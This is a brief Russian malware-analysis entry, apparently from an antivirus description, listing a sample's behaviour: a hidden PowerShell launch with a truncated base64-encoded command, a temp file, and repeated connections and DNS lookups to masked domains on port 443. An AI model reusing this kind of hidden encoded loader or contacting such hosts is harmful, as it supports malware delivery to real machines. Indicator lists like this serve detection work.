Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABLAHMAdgBzAGIAbwB6AGgAaAA9ACcAWgBvAGcAZQBqAGUAdQBqAHcAdAAnADsAJABYAGEAZgByAHEAZwB5AHAAIAA9ACAAJwA0ADEAOQAnADsAJABIAGMAeABlAHoAbwBwAGcAbQBzAGYAPQAnAFEAegByAGY...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 2012
- %TEMP%\992961.cvr
- 'es##ad.us':443
- 'mi###ightbd.com':443
- 'ag####andrakm.com':443
- 'sv#####boratorier.com':443
- 'pl######me.chancegal.com':443
- 'es##ad.us':443
- 'mi###ightbd.com':443
- 'ag####andrakm.com':443
- 'sv#####boratorier.com':443
- 'pl######me.chancegal.com':443
- DNS ASK es##ad.us
- DNS ASK mi###ightbd.com
- DNS ASK ag####andrakm.com
- DNS ASK sv#####boratorier.com
- DNS ASK pl######me.chancegal.com